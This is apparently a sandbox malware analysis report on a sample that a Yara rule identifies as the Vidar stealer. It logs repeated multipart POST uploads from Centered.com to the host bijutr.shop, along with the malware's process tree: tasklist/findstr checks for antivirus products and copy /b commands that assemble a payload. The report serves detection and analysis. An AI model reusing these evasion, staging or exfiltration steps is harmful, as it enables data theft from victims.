                                                                                                                                                                                                                                                                                      Content-Length: 0
                                                                                                                                                                                                                                                                                      Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                                                      Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                      P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
                                                                                                                                                                                                                                                                                      Set-Cookie: MC1=GUID=88d64f4411624d41bda350c8fe3cfea7&HASH=88d6&LV=202412&V=4&LU=1735279849239; Domain=.microsoft.com; Expires=Sat, 27 Dec 2025 06:10:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      Set-Cookie: MS0=a50e063031b443418544eb9c36d0e64d; Domain=.microsoft.com; Expires=Fri, 27 Dec 2024 06:40:49 GMT; Path=/;Secure; SameSite=None
                                                                                                                                                                                                                                                                                      time-delta-millis: -6896568
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Headers: P3P,Set-Cookie,time-delta-millis
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Credentials: true
                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: https://ntp.msn.com
                                                                                                                                                                                                                                                                                      Access-Control-Expose-Headers: time-delta-millis
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:48 GMT
                                                                                                                                                                                                                                                                                      Connection: close


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
45  192.168.2.7  49932  188.245.216.205  443  7244  C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:10:50 UTC  324  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----5FCTR1D2DTRQQIMGVASJ
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 6989
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:50 UTC  6989  OUT
                                                                                                                                                                                                                                                                                      Data Ascii: ------5FCTR1D2DTRQQIMGVASJContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------5FCTR1D2DTRQQIMGVASJContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------5FCTR1D2DTRQQIMGVASJCont
2024-12-27 06:10:51 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:10:51 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:10:51 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
46  192.168.2.7  49938  188.245.216.205  443  7244  C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:10:59 UTC  325  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----9ZCBA1NYM7GV3E3OH47G
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 32481
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:10:59 UTC  16355  OUT
                                                                                                                                                                                                                                                                                      Data Ascii: ------9ZCBA1NYM7GV3E3OH47GContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------9ZCBA1NYM7GV3E3OH47GContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------9ZCBA1NYM7GV3E3OH47GCont
2024-12-27 06:10:59 UTC  16126  OUT
2024-12-27 06:11:00 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:00 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:11:00 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
47  192.168.2.7  49940  188.245.216.205  443  7244  C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:11:00 UTC  324  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----890R9H47QQ9RQIE3EUKX
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 4421
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:11:00 UTC  4421  OUT
                                                                                                                                                                                                                                                                                      Data Ascii: ------890R9H47QQ9RQIE3EUKXContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------890R9H47QQ9RQIE3EUKXContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------890R9H47QQ9RQIE3EUKXCont
2024-12-27 06:11:01 UTC  158  IN  HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:01 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:11:01 UTC  12  IN  Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID  Source IP  Source Port  Destination IP  Destination Port  PID  Process
48  192.168.2.7  49942  188.245.216.205  443  7244  C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp  Bytes transferred  Direction  Data
2024-12-27 06:11:02 UTC  324  OUT  POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----JWB1NYCJM7G4EUKNOHVA
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 4421
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:11:02 UTC | 4421 | OUT | Data Ascii: ------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------JWB1NYCJM7G4EUKNOHVACont
2024-12-27 06:11:03 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:03 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:03 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
49 | 192.168.2.7 | 49943 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:03 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JWB1NYCJM7G4EUKNOHVA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6533
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:03 UTC | 6533 | OUT | Data Ascii: ------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------JWB1NYCJM7G4EUKNOHVAContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------JWB1NYCJM7G4EUKNOHVACont
2024-12-27 06:11:04 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:04 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:04 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
50 | 192.168.2.7 | 49945 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:05 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----DJ5XLFCJM7GV3EUKXLFU
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 3269
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:05 UTC | 3269 | OUT | Data Ascii: ------DJ5XLFCJM7GV3EUKXLFUContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------DJ5XLFCJM7GV3EUKXLFUContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------DJ5XLFCJM7GV3EUKXLFUCont
2024-12-27 06:11:06 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:06 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:06 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
51 | 192.168.2.7 | 49946 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:06 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----PZMGDJECBA1N7QIE37YC
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 11445
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:06 UTC | 11445 | OUT | Data Ascii: ------PZMGDJECBA1N7QIE37YCContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------PZMGDJECBA1N7QIE37YCContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------PZMGDJECBA1N7QIE37YCCont
2024-12-27 06:11:07 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:07 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:07 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
52 | 192.168.2.7 | 49947 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:08 UTC | 325 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----37QQQQ16FUSRQQ1VAS2D
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 14153
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:08 UTC | 14153 | OUT | Data Ascii: ------37QQQQ16FUSRQQ1VAS2DContent-Disposition: form-data; name="token"f8090c1106931fd0bd02c352c03692b3------37QQQQ16FUSRQQ1VAS2DContent-Disposition: form-data; name="build_id"ee9b3806cf29a5658c0aad31dbbc8e7d------37QQQQ16FUSRQQ1VAS2DCont
2024-12-27 06:11:09 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:09 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:09 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
53 | 192.168.2.7 | 49948 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:09 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----WLN79ZCTRI58YUAI5PZ5
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 4277
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:09 UTC | 4277 | OUT | Data Ascii:
------WLN79ZCTRI58YUAI5PZ5
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------WLN79ZCTRI58YUAI5PZ5
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------WLN79ZCTRI58YUAI5PZ5
Cont
2024-12-27 06:11:10 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:10 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:10 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
54 | 192.168.2.7 | 49949 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:11 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----T2689RQIEU3EUA1N7YM7
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 6249
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:11 UTC | 6249 | OUT | Data Ascii:
------T2689RQIEU3EUA1N7YM7
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------T2689RQIEU3EUA1N7YM7
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------T2689RQIEU3EUA1N7YM7
Cont
2024-12-27 06:11:12 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:12 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
55 | 192.168.2.7 | 49950 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:12 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----O8Q1DJMYMYMYU3ECJMGD
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 4573
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:12 UTC | 4573 | OUT | Data Ascii:
------O8Q1DJMYMYMYU3ECJMGD
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------O8Q1DJMYMYMYU3ECJMGD
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------O8Q1DJMYMYMYU3ECJMGD
Cont
2024-12-27 06:11:13 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:13 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:13 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
56 | 192.168.2.7 | 49951 | 188.245.216.205 | 443 | 7244 | C:\Users\user\AppData\Local\Temp\322891\Centered.com

Timestamp | Bytes transferred | Direction | Data
2024-12-27 06:11:14 UTC | 324 | OUT | POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----T26XT2VAAAAAAAIM7GDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
Host: bijutr.shop
Content-Length: 1977
Connection: Keep-Alive
Cache-Control: no-cache
2024-12-27 06:11:14 UTC | 1977 | OUT | Data Ascii:
------T26XT2VAAAAAAAIM7GDB
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------T26XT2VAAAAAAAIM7GDB
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------T26XT2VAAAAAAAIM7GDB
Cont
2024-12-27 06:11:15 UTC | 158 | IN | HTTP/1.1 200 OK
Server: nginx
Date: Fri, 27 Dec 2024 06:11:15 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
2024-12-27 06:11:15 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
57          192.168.2.7  49952        188.245.216.205  443               7244  C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp                Bytes transferred  Direction  Data
2024-12-27 06:11:15 UTC  324                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----BA1VAI58YMYU379R1D26
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 3161
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:11:15 UTC  3161               OUT        Data Ascii: ------BA1VAI58YMYU379R1D26
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------BA1VAI58YMYU379R1D26
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------BA1VAI58YMYU379R1D26
Cont
2024-12-27 06:11:16 UTC  158                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:16 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:11:16 UTC  12                 IN         Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


Session ID  Source IP    Source Port  Destination IP   Destination Port  PID   Process
58          192.168.2.7  49953        188.245.216.205  443               7244  C:\Users\user\AppData\Local\Temp\322891\Centered.com
Timestamp                Bytes transferred  Direction  Data
2024-12-27 06:11:17 UTC  324                OUT        POST / HTTP/1.1
                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----R9HLNOHDJMYUAA1DT0HL
                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                      Content-Length: 1697
                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
2024-12-27 06:11:17 UTC  1697               OUT        Data Ascii: ------R9HLNOHDJMYUAA1DT0HL
Content-Disposition: form-data; name="token"

f8090c1106931fd0bd02c352c03692b3
------R9HLNOHDJMYUAA1DT0HL
Content-Disposition: form-data; name="build_id"

ee9b3806cf29a5658c0aad31dbbc8e7d
------R9HLNOHDJMYUAA1DT0HL
Cont
2024-12-27 06:11:18 UTC  158                IN         HTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                      Date: Fri, 27 Dec 2024 06:11:18 GMT
                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                      Connection: close
2024-12-27 06:11:18 UTC  12                 IN         Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0



                                                                                                                                                                                                                                                                                      Target ID:0
                                                                                                                                                                                                                                                                                      Start time:01:09:11
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Users\user\Desktop\din.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Users\user\Desktop\din.exe"
                                                                                                                                                                                                                                                                                      Imagebase:0x400000
                                                                                                                                                                                                                                                                                      File size:1'224'479 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:CE76B7CDA29A7EA80917E5844A7FCA42
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:2
                                                                                                                                                                                                                                                                                      Start time:01:09:12
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:"C:\Windows\System32\cmd.exe" /c copy Appreciated Appreciated.cmd & Appreciated.cmd
                                                                                                                                                                                                                                                                                      Imagebase:0x410000
                                                                                                                                                                                                                                                                                      File size:236'544 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:3
                                                                                                                                                                                                                                                                                      Start time:01:09:12
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):false
                                                                                                                                                                                                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                                                                                                                                                                      Imagebase:0x7ff75da10000
                                                                                                                                                                                                                                                                                      File size:862'208 bytes
                                                                                                                                                                                                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                                                                                                                                                                                      Has elevated privileges:true
                                                                                                                                                                                                                                                                                      Has administrator privileges:true
                                                                                                                                                                                                                                                                                      Programmed in:C, C++ or other language
                                                                                                                                                                                                                                                                                      Reputation:high
                                                                                                                                                                                                                                                                                      Has exited:true

                                                                                                                                                                                                                                                                                      Target ID:4
                                                                                                                                                                                                                                                                                      Start time:01:09:13
                                                                                                                                                                                                                                                                                      Start date:27/12/2024
                                                                                                                                                                                                                                                                                      Path:C:\Windows\SysWOW64\tasklist.exe
                                                                                                                                                                                                                                                                                      Wow64 process (32bit):true
                                                                                                                                                                                                                                                                                      Commandline:tasklist
Imagebase:0xba0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:5
Start time:01:09:13
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /I "opssvc wrsa"
Imagebase:0x2c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:7
Start time:01:09:13
Start date:27/12/2024
Path:C:\Windows\SysWOW64\tasklist.exe
Wow64 process (32bit):true
Commandline:tasklist
Imagebase:0xba0000
File size:79'360 bytes
MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:01:09:13
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr "AvastUI AVGUI bdservicehost nsWscSvc ekrn SophosHealth"
Imagebase:0x2c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:13
Start time:01:09:14
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c md 322891
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:14
Start time:01:09:14
Start date:27/12/2024
Path:C:\Windows\SysWOW64\findstr.exe
Wow64 process (32bit):true
Commandline:findstr /V "cache" Bulgaria
Imagebase:0x2c0000
File size:29'696 bytes
MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:15
Start time:01:09:14
Start date:27/12/2024
Path:C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):true
Commandline:cmd /c copy /b ..\Gc + ..\Large + ..\Rights + ..\Becomes I
Imagebase:0x410000
File size:236'544 bytes
MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:16
Start time:01:09:14
Start date:27/12/2024
Path:C:\Users\user\AppData\Local\Temp\322891\Centered.com
Wow64 process (32bit):true
Commandline:Centered.com I
Imagebase:0xf00000
File size:947'288 bytes
MD5 hash:62D09F076E6E0240548C2F837536A46A
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Yara matches:
• Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000010.00000002.2505513959.00000000049C1000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
